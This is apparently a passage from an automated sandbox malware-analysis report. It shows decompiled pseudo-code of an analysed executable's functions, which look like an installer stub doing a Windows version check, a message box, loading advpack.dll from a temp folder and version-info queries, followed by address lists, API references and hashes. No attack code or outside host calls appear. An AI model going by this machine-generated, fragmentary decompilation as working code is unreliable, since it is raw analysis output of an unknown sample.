							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0x59a40 = _t119;
						 *0x58184 = 1;
						 *0x58180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0x59a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0x58184 = _t135;
							 *0x58180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E000544B9(0, _t138);
					L66:
					return E00056CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}





































                                                                                                                                                                                                                                                0x000536f9
                                                                                                                                                                                                                                                0x00053700
                                                                                                                                                                                                                                                0x0005370c
                                                                                                                                                                                                                                                0x00053716
                                                                                                                                                                                                                                                0x00053718
                                                                                                                                                                                                                                                0x0005371b
                                                                                                                                                                                                                                                0x00053721
                                                                                                                                                                                                                                                0x0005372b
                                                                                                                                                                                                                                                0x0005373d
                                                                                                                                                                                                                                                0x00053745
                                                                                                                                                                                                                                                0x00053746
                                                                                                                                                                                                                                                0x00053746
                                                                                                                                                                                                                                                0x00053749
                                                                                                                                                                                                                                                0x000537ab
                                                                                                                                                                                                                                                0x000537ad
                                                                                                                                                                                                                                                0x000537ae
                                                                                                                                                                                                                                                0x000537b3
                                                                                                                                                                                                                                                0x000537b8
                                                                                                                                                                                                                                                0x000537b8
                                                                                                                                                                                                                                                0x000537bf
                                                                                                                                                                                                                                                0x000537bf
                                                                                                                                                                                                                                                0x000537c5
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000537cb
                                                                                                                                                                                                                                                0x000537cd
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000537d5
                                                                                                                                                                                                                                                0x000537db
                                                                                                                                                                                                                                                0x000537e8
                                                                                                                                                                                                                                                0x000537ea
                                                                                                                                                                                                                                                0x000537ea
                                                                                                                                                                                                                                                0x000537ea
                                                                                                                                                                                                                                                0x000537f0
                                                                                                                                                                                                                                                0x000537f6
                                                                                                                                                                                                                                                0x00053805
                                                                                                                                                                                                                                                0x00053817
                                                                                                                                                                                                                                                0x0005382b
                                                                                                                                                                                                                                                0x00053830
                                                                                                                                                                                                                                                0x00053836
                                                                                                                                                                                                                                                0x0005383b
                                                                                                                                                                                                                                                0x0005383d
                                                                                                                                                                                                                                                0x000538eb
                                                                                                                                                                                                                                                0x000538eb
                                                                                                                                                                                                                                                0x000538f2
                                                                                                                                                                                                                                                0x0005390c
                                                                                                                                                                                                                                                0x00053911
                                                                                                                                                                                                                                                0x00053911
                                                                                                                                                                                                                                                0x00053913
                                                                                                                                                                                                                                                0x0005394d
                                                                                                                                                                                                                                                0x0005394d
                                                                                                                                                                                                                                                0x0005394f
                                                                                                                                                                                                                                                0x000538a9
                                                                                                                                                                                                                                                0x000538a9
                                                                                                                                                                                                                                                0x000538b0
                                                                                                                                                                                                                                                0x000538b2
                                                                                                                                                                                                                                                0x000538b9
                                                                                                                                                                                                                                                0x000538bb
                                                                                                                                                                                                                                                0x000538c1
                                                                                                                                                                                                                                                0x00053975
                                                                                                                                                                                                                                                0x000538c7
                                                                                                                                                                                                                                                0x000538de
                                                                                                                                                                                                                                                0x000538e0
                                                                                                                                                                                                                                                0x000538e0
                                                                                                                                                                                                                                                0x0005397b
                                                                                                                                                                                                                                                0x0005397d
                                                                                                                                                                                                                                                0x000539a9
                                                                                                                                                                                                                                                0x0005397f
                                                                                                                                                                                                                                                0x00053982
                                                                                                                                                                                                                                                0x0005398b
                                                                                                                                                                                                                                                0x0005398d
                                                                                                                                                                                                                                                0x0005398f
                                                                                                                                                                                                                                                0x0005399f
                                                                                                                                                                                                                                                0x000539a1
                                                                                                                                                                                                                                                0x00053991
                                                                                                                                                                                                                                                0x00053991
                                                                                                                                                                                                                                                0x00053991
                                                                                                                                                                                                                                                0x0005398f
                                                                                                                                                                                                                                                0x000539af
                                                                                                                                                                                                                                                0x000539b6
                                                                                                                                                                                                                                                0x00053a0f
                                                                                                                                                                                                                                                0x00053a0f
                                                                                                                                                                                                                                                0x00053a11
                                                                                                                                                                                                                                                0x00053a13
                                                                                                                                                                                                                                                0x00053a19
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000539b8
                                                                                                                                                                                                                                                0x000539b8
                                                                                                                                                                                                                                                0x000539ba
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000539bc
                                                                                                                                                                                                                                                0x000539bf
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000539c3
                                                                                                                                                                                                                                                0x000539c9
                                                                                                                                                                                                                                                0x000539ce
                                                                                                                                                                                                                                                0x000539d0
                                                                                                                                                                                                                                                0x000539e3
                                                                                                                                                                                                                                                0x000539e5
                                                                                                                                                                                                                                                0x000539e6
                                                                                                                                                                                                                                                0x000539f1
                                                                                                                                                                                                                                                0x000539f7
                                                                                                                                                                                                                                                0x000539fa
                                                                                                                                                                                                                                                0x00053a01
                                                                                                                                                                                                                                                0x00053a04
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053a06
                                                                                                                                                                                                                                                0x00053a09
                                                                                                                                                                                                                                                0x00053a09
                                                                                                                                                                                                                                                0x00053a0b
                                                                                                                                                                                                                                                0x00053a0b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053a09
                                                                                                                                                                                                                                                0x000539fc
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000539fc
                                                                                                                                                                                                                                                0x000539d3
                                                                                                                                                                                                                                                0x000539d8
                                                                                                                                                                                                                                                0x000539da
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000539dc
                                                                                                                                                                                                                                                0x000539b6
                                                                                                                                                                                                                                                0x00053955
                                                                                                                                                                                                                                                0x0005395b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053961
                                                                                                                                                                                                                                                0x00053963
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053969
                                                                                                                                                                                                                                                0x00053969
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053969
                                                                                                                                                                                                                                                0x00053915
                                                                                                                                                                                                                                                0x00053915
                                                                                                                                                                                                                                                0x0005391b
                                                                                                                                                                                                                                                0x0005391f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005392d
                                                                                                                                                                                                                                                0x00053933
                                                                                                                                                                                                                                                0x00053938
                                                                                                                                                                                                                                                0x0005393a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053940
                                                                                                                                                                                                                                                0x00053946
                                                                                                                                                                                                                                                0x0005394b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005394b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000538f2
                                                                                                                                                                                                                                                0x00053843
                                                                                                                                                                                                                                                0x00053845
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005384b
                                                                                                                                                                                                                                                0x0005384d
                                                                                                                                                                                                                                                0x00053883
                                                                                                                                                                                                                                                0x00053885
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005389a
                                                                                                                                                                                                                                                0x0005389e
                                                                                                                                                                                                                                                0x0005389e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000538a0
                                                                                                                                                                                                                                                0x000538a0
                                                                                                                                                                                                                                                0x000538a2
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000538a4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000538a4
                                                                                                                                                                                                                                                0x0005384f
                                                                                                                                                                                                                                                0x00053851
                                                                                                                                                                                                                                                0x00053857
                                                                                                                                                                                                                                                0x0005386e
                                                                                                                                                                                                                                                0x00053877
                                                                                                                                                                                                                                                0x0005387b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053881
                                                                                                                                                                                                                                                0x00053859
                                                                                                                                                                                                                                                0x0005385c
                                                                                                                                                                                                                                                0x00053862
                                                                                                                                                                                                                                                0x00053866
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053868
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000538f4
                                                                                                                                                                                                                                                0x000538f4
                                                                                                                                                                                                                                                0x000538f5
                                                                                                                                                                                                                                                0x000538fb
                                                                                                                                                                                                                                                0x00053901
                                                                                                                                                                                                                                                0x00053901
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005390a
                                                                                                                                                                                                                                                0x0005374b
                                                                                                                                                                                                                                                0x0005374e
                                                                                                                                                                                                                                                0x0005375c
                                                                                                                                                                                                                                                0x00053764
                                                                                                                                                                                                                                                0x00053769
                                                                                                                                                                                                                                                0x0005376e
                                                                                                                                                                                                                                                0x00053771
                                                                                                                                                                                                                                                0x0005379c
                                                                                                                                                                                                                                                0x0005379f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000537a3
                                                                                                                                                                                                                                                0x000537a4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000537a4
                                                                                                                                                                                                                                                0x00053773
                                                                                                                                                                                                                                                0x00053777
                                                                                                                                                                                                                                                0x00053778
                                                                                                                                                                                                                                                0x0005377f
                                                                                                                                                                                                                                                0x00053781
                                                                                                                                                                                                                                                0x0005378e
                                                                                                                                                                                                                                                0x0005378e
                                                                                                                                                                                                                                                0x00053794
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053794
                                                                                                                                                                                                                                                0x00053783
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053785
                                                                                                                                                                                                                                                0x0005378c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005378c
                                                                                                                                                                                                                                                0x00053750
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005372d
                                                                                                                                                                                                                                                0x0005372d
                                                                                                                                                                                                                                                0x0005396b
                                                                                                                                                                                                                                                0x0005396b
                                                                                                                                                                                                                                                0x0005396c
                                                                                                                                                                                                                                                0x0005396e
                                                                                                                                                                                                                                                0x0005396f
                                                                                                                                                                                                                                                0x00053a1e
                                                                                                                                                                                                                                                0x00053a1e
                                                                                                                                                                                                                                                0x00053a22
                                                                                                                                                                                                                                                0x00053a27
                                                                                                                                                                                                                                                0x00053a3e
                                                                                                                                                                                                                                                0x00053a3e

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00053723
                                                                                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 000539C3
                                                                                                                                                                                                                                                • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 000539F1
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$BeepVersion
                                                                                                                                                                                                                                                • String ID: 3$lenta
                                                                                                                                                                                                                                                • API String ID: 2519184315-4216304122
                                                                                                                                                                                                                                                • Opcode ID: 192b2813f0627afc96908907778f2c00a49294519021c4c7cf6b1f0e0a50bcc1
                                                                                                                                                                                                                                                • Instruction ID: 96cd7b196c2445cac5669efb8213231d67e9415094e2660e523c5f8c6cb715ec
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 192b2813f0627afc96908907778f2c00a49294519021c4c7cf6b1f0e0a50bcc1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0491E4B1E012249BEBB58A14CC817FBB7E4AB45386F1541A9DC49EB241DB748F88CF51
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00056495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41libraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 83%
                                                                                                                                                                                                                                                			E00056495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0x58004; // 0x5a679bd9
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E00051781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
				_t26 = "advpack.dll";
				E0005658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E00056CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}













                                                                                                                                                                                                                                                0x00056495
                                                                                                                                                                                                                                                0x00056495
                                                                                                                                                                                                                                                0x000564a0
                                                                                                                                                                                                                                                0x000564a7
                                                                                                                                                                                                                                                0x000564ab
                                                                                                                                                                                                                                                0x000564bd
                                                                                                                                                                                                                                                0x000564c2
                                                                                                                                                                                                                                                0x000564d3
                                                                                                                                                                                                                                                0x000564df
                                                                                                                                                                                                                                                0x000564e8
                                                                                                                                                                                                                                                0x00056502
                                                                                                                                                                                                                                                0x000564ee
                                                                                                                                                                                                                                                0x000564f9
                                                                                                                                                                                                                                                0x000564f9
                                                                                                                                                                                                                                                0x00056516

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 000564DF
                                                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 000564F9
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00056502
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                                                                                                                                                                                                • API String ID: 438848745-258089097
                                                                                                                                                                                                                                                • Opcode ID: 8584481e68494ef2b119c908bab27b518b03aec7f462a045135f4e273aaa0bc8
                                                                                                                                                                                                                                                • Instruction ID: 6f0992e701abeb5559cafde06f7c5cfc3fc0ec0e4b7d261d8d7aeb2e18d68857
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8584481e68494ef2b119c908bab27b518b03aec7f462a045135f4e273aaa0bc8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F012630640208ABE750DB64DC49BEF7778DB51312F900294FD85930C0DF75AE8D8A41
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000528E8 Relevance: 7.6, APIs: 5, Instructions: 140memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E000528E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				int _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E00052773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00052A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00052A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

































                                                                                                                                                                                                                                                0x000528f1
                                                                                                                                                                                                                                                0x000528f4
                                                                                                                                                                                                                                                0x000528f7
                                                                                                                                                                                                                                                0x000528f9
                                                                                                                                                                                                                                                0x000528fc
                                                                                                                                                                                                                                                0x000528ff
                                                                                                                                                                                                                                                0x00052901
                                                                                                                                                                                                                                                0x00052907
                                                                                                                                                                                                                                                0x00052a62
                                                                                                                                                                                                                                                0x00052a64
                                                                                                                                                                                                                                                0x0005290d
                                                                                                                                                                                                                                                0x0005290d
                                                                                                                                                                                                                                                0x0005290f
                                                                                                                                                                                                                                                0x00052912
                                                                                                                                                                                                                                                0x00052920
                                                                                                                                                                                                                                                0x00052937
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052944
                                                                                                                                                                                                                                                0x0005294a
                                                                                                                                                                                                                                                0x0005294f
                                                                                                                                                                                                                                                0x00052a2f
                                                                                                                                                                                                                                                0x00052a32
                                                                                                                                                                                                                                                0x00052a34
                                                                                                                                                                                                                                                0x00052a37
                                                                                                                                                                                                                                                0x00052a41
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052955
                                                                                                                                                                                                                                                0x0005295e
                                                                                                                                                                                                                                                0x00052962
                                                                                                                                                                                                                                                0x00052969
                                                                                                                                                                                                                                                0x0005296f
                                                                                                                                                                                                                                                0x00052974
                                                                                                                                                                                                                                                0x0005298c
                                                                                                                                                                                                                                                0x00052a20
                                                                                                                                                                                                                                                0x00052a21
                                                                                                                                                                                                                                                0x00052a27
                                                                                                                                                                                                                                                0x00052a4c
                                                                                                                                                                                                                                                0x00052a4f
                                                                                                                                                                                                                                                0x00052a50
                                                                                                                                                                                                                                                0x00052a53
                                                                                                                                                                                                                                                0x00052a56
                                                                                                                                                                                                                                                0x00052a5c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000529b2
                                                                                                                                                                                                                                                0x000529b2
                                                                                                                                                                                                                                                0x000529b5
                                                                                                                                                                                                                                                0x000529bd
                                                                                                                                                                                                                                                0x000529c3
                                                                                                                                                                                                                                                0x000529cc
                                                                                                                                                                                                                                                0x000529d5
                                                                                                                                                                                                                                                0x000529d7
                                                                                                                                                                                                                                                0x000529da
                                                                                                                                                                                                                                                0x000529dd
                                                                                                                                                                                                                                                0x000529df
                                                                                                                                                                                                                                                0x000529ec
                                                                                                                                                                                                                                                0x000529f8
                                                                                                                                                                                                                                                0x000529fc
                                                                                                                                                                                                                                                0x000529ff
                                                                                                                                                                                                                                                0x00052a02
                                                                                                                                                                                                                                                0x00052a07
                                                                                                                                                                                                                                                0x00052a0a
                                                                                                                                                                                                                                                0x00052a0f
                                                                                                                                                                                                                                                0x00052a19
                                                                                                                                                                                                                                                0x00052a81
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052a0f
                                                                                                                                                                                                                                                0x0005298c
                                                                                                                                                                                                                                                0x00052974
                                                                                                                                                                                                                                                0x00052962
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005294f
                                                                                                                                                                                                                                                0x00052912
                                                                                                                                                                                                                                                0x00052a65
                                                                                                                                                                                                                                                0x00052a68
                                                                                                                                                                                                                                                0x00052a6c
                                                                                                                                                                                                                                                0x00052a6f
                                                                                                                                                                                                                                                0x00052a6f
                                                                                                                                                                                                                                                0x00052a7d

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GlobalFree.KERNEL32 ref: 00052A6F
                                                                                                                                                                                                                                                  • Part of subcall function 00052773: CharUpperA.USER32(5A679BD9,00000000,00000000,00000000), ref: 000527A8
                                                                                                                                                                                                                                                  • Part of subcall function 00052773: CharNextA.USER32(0000054D), ref: 000527B5
                                                                                                                                                                                                                                                  • Part of subcall function 00052773: CharNextA.USER32(00000000), ref: 000527BC
                                                                                                                                                                                                                                                  • Part of subcall function 00052773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00052829
                                                                                                                                                                                                                                                  • Part of subcall function 00052773: RegQueryValueExA.ADVAPI32(?,00051140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00052852
                                                                                                                                                                                                                                                  • Part of subcall function 00052773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00052870
                                                                                                                                                                                                                                                  • Part of subcall function 00052773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000528A0
                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00053938,?,?,?,?,-00000005), ref: 00052958
                                                                                                                                                                                                                                                • GlobalLock.KERNEL32 ref: 00052969
                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00053938,?,?,?,?,-00000005,?), ref: 00052A21
                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00052A81
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3949799724-0
                                                                                                                                                                                                                                                • Opcode ID: 6c18da9d250fdf9dd59a4d3732409d83ccd39efd6eb008c429917ee9c087873e
                                                                                                                                                                                                                                                • Instruction ID: 703110ff8f360b558402684015111b2fcd9b2e8cc9216fd1c2737463b32ad439
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c18da9d250fdf9dd59a4d3732409d83ccd39efd6eb008c429917ee9c087873e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82513831E00219DBDB21CF98C884AAFFBB5FF49702F14412AE905E3251DB359D45DB91
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00054169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 32%
